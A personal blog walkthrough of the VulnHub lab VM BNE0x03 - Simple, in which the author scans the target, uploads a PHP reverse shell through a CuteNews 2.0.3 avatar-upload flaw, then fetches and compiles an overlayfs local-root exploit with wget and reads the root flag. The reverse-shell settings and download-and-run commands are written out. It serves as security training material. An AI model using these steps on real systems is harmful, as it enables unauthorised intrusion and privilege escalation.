BNE0x03 - Simple Walkthrough

This is my first VulnHub write-up. I've accrued many folders in my KeepNote and decided it was time to post them in a centralized location to help myself become better at documenting my findings. More than likely the first few posts will be very simple and will not have much narrative. As I become more comfortable, I will start to add my own spin on things. Let's do this.

This VM is called SecTalks: BNE0x03 - Simple and it was created by Robert Winkel

I spin up the VM in VirtualBox and kick off an nmap scan on my vboxnet0 interface 192.168.56.0/24:




root@localhost:~/VM/simple-vm# nmap 192.168.56.0/24

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-10 20:02 CDT
Nmap scan report for 192.168.56.100
Host is up (0.000055s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:E1:F0:DE (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.104
Host is up (0.00014s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:60:21:5C (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.1
Host is up (0.0000020s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
111/tcp open  rpcbind

Nmap done: 256 IP addresses (3 hosts up) scanned in 7.79 seconds
root@localhost:~/VM/simple-vm#

I see that 192.168.56.104 is the box in question. It's time to perform a deeper scan on the host:

root@localhost:~/VM/simple-vm# nmap -p- 192.168.56.104

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-10 20:06 CDT
Nmap scan report for 192.168.56.104
Host is up (0.00011s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:60:21:5C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds
root@localhost:~/VM/simple-vm# 


Looks like this host has only 1 port open, 80. Let's take a look at what's being served on this page. I navigate to the webpage and I'm presented with a CuteNews v.2.0.3 login page:


 After performing some research, I see that CuteNews v.2.0.3 is vulnerable to an Remote File Upload vulnerability. Looking at the details of the vulnerability, the following steps need to be performed in order to exploit this vulnerability:


 1 - Sign up for New User
 2 - Log In 
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data  & Rename File Evil.jpg to Evil.php
   
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
 
6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
 
 Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php

Time to get to work. I create a new user by clicking (register) and entering the following:

Username: geoda
Nickname: geoda
Password: geodageoda
Confirm: geodageoda
Email: geoda@geoda.com


I login and click on Personal options.

At this point, I need to upload an avatar which will be my reverse shell utilizing php. Lucky for me, and thanks to pentester monkey, there's a reverse shell already created for us in Kali!

This reverse shell is located in /usr/share/webshells/php/php-reverse-shells.php

I copy this file down and save it as Evil.jpg:

root@localhost:~/VM/simple-vm# cat Evil.jpg 
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

[...snippet...]

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.1';  // CHANGE THIS
$port = 443;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

[...snippet...]

root@localhost:~/VM/simple-vm# 

As shown above, I updated the IP and Port to 192.168.56.1 and 443 respectively.

Now that I have my reverse shell in order, it's time to upload it CuteNews, intercept the image utilizing tamper data and rename the file to the proper .php extension.

I click Browse... and locate my Evil.jpg reverse shell and press Okay. I then fire up tamper data and press Save Changes.

Tamper data immediately captures my request and asked if I'd like to tamper the data. I say yes:



Per the exploit, I need to change the Evil.jpg to Evil.php within the POST_DATA parameter as shown below:


Is changed to:


I press okay and submit the updated payload. If all is successful, I should run netcat on port 443 and navigate to my reverse shell file and a reverse shell should pop.


Success!! I am on the box as a www-data user

First things first, I break out of my "jail" with python:


$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@simple:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@simple:/$ 

I then navigate around the box and recognize that it is running Ubuntu 14.04 and kernel 3.16.


www-data@simple:/$ cat /proc/version
cat /proc/version
Linux version 3.16.0-30-generic (buildd@phianna) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015
www-data@simple:/$ 

This is vulnerable to a 'overlayfs' Local Root Shell exploit.

I download the exploit to my local host and then add it to my /var/www/ directory and start apache.


root@localhost:/var/www/html# ls 37292.c 
37292.c
root@localhost:/var/www/html# 

While on the remote host, I upload my exploit to the /tmp directory and compile:


www-data@simple:/tmp$ wget http://192.168.56.1/37292.c -O exploit.c
wget http://192.168.56.1/37292.c -O exploit.c
--2016-08-10 23:27:05--  http://192.168.56.1/37292.c
Connecting to 192.168.56.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4969 (4.9K) [text/x-csrc]
Saving to: 'exploit.c'

100%[======================================>] 4,969       --.-K/s   in 0s      

2016-08-10 23:27:05 (1.27 GB/s) - 'exploit.c' saved [4969/4969]

www-data@simple:/tmp$ gcc exploit.c -o exploit
gcc exploit.c -o exploit
www-data@simple:/tmp$ 

Now that my exploit is loaded, I verify my current user and then launch the exploit:


www-data@simple:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@simple:/tmp$ ./exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# 

Success! I am now running as root! I navigate to the /root directory and cat the flag.txt:


# cd /root
cd /root
# ls
ls
flag.txt
# cat flag.txt
cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
# 

This was a great first VM to publish and I enjoyed utilizing 2 vulnerabilities (1 for remote access and the other for privilege escalation).

Thanks Robert Winkel for creating this VM and, thanks Vulnhub for hosting it!